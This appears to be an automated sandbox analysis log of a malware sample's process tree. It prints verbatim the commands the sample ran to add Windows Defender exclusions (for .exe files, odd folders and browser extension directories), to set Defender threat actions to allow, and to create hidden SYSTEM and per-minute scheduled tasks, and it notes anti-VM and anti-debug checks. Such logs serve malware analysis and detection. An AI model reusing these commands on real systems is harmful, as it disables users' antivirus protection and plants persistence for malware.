C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force11⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force12⤵
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m where.exe /c "cmd /C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden WMIC /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\WMIC.exe"C:\Windows\System32\Wbem\WMIC.exe" /NAMESPACE:\\root\Microsoft\Windows\Defender PATH MSFT_MpPreference call Add ExclusionExtension=exe Force=True11⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bqGGCwwWIommTRgeuN" /SC once /ST 05:07:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exe\" 1g /alFdidyCEP 385118 /S" /V1 /F8⤵
- Drops file in Windows directory
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m waitfor.exe /c "cmd /C schtasks /run /I /tn bqGGCwwWIommTRgeuN"8⤵
-
C:\Windows\SysWOW64\cmd.exe/C schtasks /run /I /tn bqGGCwwWIommTRgeuN9⤵
-
\??\c:\windows\SysWOW64\schtasks.exeschtasks /run /I /tn bqGGCwwWIommTRgeuN10⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3448 -s 14368⤵
- Program crash
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"4⤵
-
C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN Newoff.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000031001\Newoff.exe" /F4⤵
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exeC:\Users\Admin\AppData\Local\Temp\1b29d73536\axplont.exe1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 444 -p 856 -ip 8561⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 5112 -ip 51121⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum1⤵
-
C:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exeC:\Users\Admin\AppData\Local\Temp\7zSD997.tmp\Install.exe 1g /alFdidyCEP 385118 /S1⤵
- Executes dropped EXE
- Drops desktop.ini file(s)
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"2⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m ping.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 64⤵
-
\??\c:\windows\SysWOW64\reg.exereg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 65⤵
-
C:\Windows\SysWOW64\forfiles.exeforfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"3⤵
-
C:\Windows\SysWOW64\cmd.exe/C powershell start-process -WindowStyle Hidden gpupdate.exe /force4⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell start-process -WindowStyle Hidden gpupdate.exe /force5⤵
- Command and Scripting Interpreter: PowerShell
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\gpupdate.exe"C:\Windows\system32\gpupdate.exe" /force6⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:643⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\JipyTrDkU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\YLgKyOFzWxOqC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\krdeMCnRKomDOvwVunR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\nFLFFjqrQPUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\tegRANPZONsU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\fcblnlcRRSrBhAVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\SiHRhjyUhlpwxPXaT\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\ZmzskowerwXEonlG\" /t REG_DWORD /d 0 /reg:64;"2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:324⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\JipyTrDkU" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\YLgKyOFzWxOqC" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\krdeMCnRKomDOvwVunR" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\nFLFFjqrQPUn" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\tegRANPZONsU2" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\fcblnlcRRSrBhAVB /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:323⤵
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:643⤵
-
